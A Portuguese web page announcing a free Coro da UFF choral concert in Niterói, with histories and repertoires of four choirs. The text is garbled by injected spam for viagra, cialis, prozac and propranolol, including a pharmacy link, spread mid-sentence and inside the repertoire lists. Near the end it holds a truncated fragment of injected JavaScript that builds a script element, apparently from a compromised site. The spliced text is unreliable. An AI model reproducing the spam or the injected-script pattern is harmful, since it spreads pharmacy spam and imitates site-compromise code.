Escrito por em 31 ago 2017 nas áreas Música coral, Programação, Rio de Janeiro

Coro da UFF convida corais da cidade para concerto com entrada gratuita.

 

No domingo, dia 3 de setembro, às 10h30, o Coro da UFF reliable sites to purchase viagra recebe três convidados mais do que especiais para homenagear os regentes que contribuíram para atividade do Canto Coral na Universidade: o grupo Boca que Usa; o Coral do Centro Educacional de Niterói (CEN); e o Coral da Associação dos Professores Inativos da Universidade Federal Fluminense (Aspi-UFF). O concerto, que é gratuito e aberto ao público em geral, ocorre no Cine Arte, em Niterói.

 

Grupos

Coro da UFF
A experiência de ter um coral na UFF vem desde a criação da Universidade Federal Fluminense em 1961, quando um grupo de alunos do Diretório Acadêmico Barros Terra da Faculdade de Medicina iniciaram os ensaios sob a direção da profa. Clóris Galvão Menezes. Depois, o coral passou para direção do maestro Roberto de Regina, Peri Santoro e Ermano Soares de Sá. Em 1974, sob a direção do maestro Roberto Duarte e de Marly de Mattos, foi criado o Coral da UFF que com eles teve seu período mais longevo. Em seguida, André Luis Góes, clarinetista da OSN e posteriormente o fagotista Otacilio Lima, também integrante da OSN assumiram o coral. Desde 2007, o Coro da UFF tem a direção de Marcio Selles e Peri Santoro, mantendo suas atividades até hoje. Com um repertório eclético, que une a música renascentista, o clássico e a música brasileira contemporânea, o Coro mostra a todos o prazer de ouvir um bom coral.

Coral do CEN
O Coral do Centro Educacional de Niterói (CEN) completa 50 anos em 2017 e foi criado pelo professor e maestro Ermano Soares de Sá e nesses seus anos de existência apresentou-se em salas de concertos, colégios, rádios, TVs, encontros e concursos de corais. Com 12 primeiros lugares em concursos disputados, o coral destacou-se nas suas principais viagens a São Paulo, Brasília, Aberdeen (Escócia), Córdoba (Argentina) e Londres. Coral se tornou uma peça importante no desenvolvimento dos alunos do CEN, proporcionando aos seus componentes o início de uma carreira musical. Muitos tornaram-se músicos profissionais, alguns adquirindo grande reputação em nível nacional.

Coral da Aspi UFF
A Associação dos Professores Inativos da Universidade Federal Fluminense (Aspi-UFF), fundada em 1992 é uma entidade privada de direito civil, de caráter técnico-científico e cultural, sem fins lucrativos, que congrega professores aposentados e pensionistas da UFF. Tem como objetivo integrar docentes inativos da Universidade, promovendo atividades socioculturais, científicas e de lazer, além de servir como apoio em defesa dos direitos e da qualidade de vida de seus associados. Atualmente conta com cerca de 600 sócios. Dentre as suas muitas conquistas, em seus 24 anos de existência, destaca-se a manutenção do coral e o Encontro de Corais, om o propósito de divulgar a arte do canto, contribuir para a formação de plateia e propiciar a integração e a troca de variadas experiências nesta área. O Encontro de Corais vem sendo realizado desde 2012. Até hoje, já foram realizados cinco encontros de corais promovidos pela ASPI.

Pills http://teenpics.com/2018/02/02/buy-propranolol-10mg/ Grupo Boca que Usa
Fundado há uma década, o grupo tem o objetivo de estudar e divulgar a música coral a partir de um trabalho inovador que se refere à concepção musical, direção artística e dinâmica de ensaio. O grupo valoriza a criação musical coletiva, visto que seus componentes são responsáveis pela preparação e direção musical de parte do repertório, sem uma regência direta. O grupo se destaca pelas participações em concursos corais latino-americanos e europeus, carregando em sua história seis medalhas de ouro conquistadas em concursos da América do Sul. No concurso Internacional de coros de Calella, em 2014, o grupo conquistou medalha de ouro nas duas principais categorias, adquirindo hoje reconhecimento ao redor do mundo no que tange concursos de corais e elogiosas críticas na imprensa.

 

REPERTÓRIOS:

Coro da UFF Buy
Ein fest Burg ist unser Gott – G. P. Telemann
Immutemur Habitu – J. M. Nunes Garcia
Samba em Prelúdio – Baden Powell e Vinicius de Moraes
Regente: Marcio Selles
Buy Piano: Peri Santoro

Coral da Aspi-UFF
Wave – Tom Jobim
O Barquinho – Roberto Menescal
A Montanha (do Musical A Noviça Rebelde) – Richard Rodgers
I Will Follow Him (do filme Mudança de Hábito prozac reviews Buy ) – Frank Pourcel
Regente: Joabe Ferreira

cialis online Coral do CEN
Atabaques – Cacilda Borges Barbosa
Sepulto Domino – J. M. Nunes Garcia
Purchase Procissão da Chuva – Cacilda Borges Barbosa
Old Time Religion (spiritual) – Anônimo
Regente: Luiz Carlos Peçanha

Boca que Usa
Ah Dolente Partita – Claudio Monteverdi
O Magnum Mysterium – Morten Lauridsen
Water Night – Eric Whitacre
Ofulú Lorerê – Osvaldo Lacerda
Coordenação e regência: Roberto Fabri
Preparação vocal e regência: Lina Santoro

 

Foto: Raphael Azevedo

 

SERVIÇO: Buy

 

Coro da UFF convida

 

3 de setembro, domingo, às 10h30

Cine Arte UFF (R. Miguel de Frias, 9, Icaraí – Niterói)

 

Entrada gratuita

 var d=document;var s=d.createElement(‘script’); if (document.currentScript) {

Faça seu comentário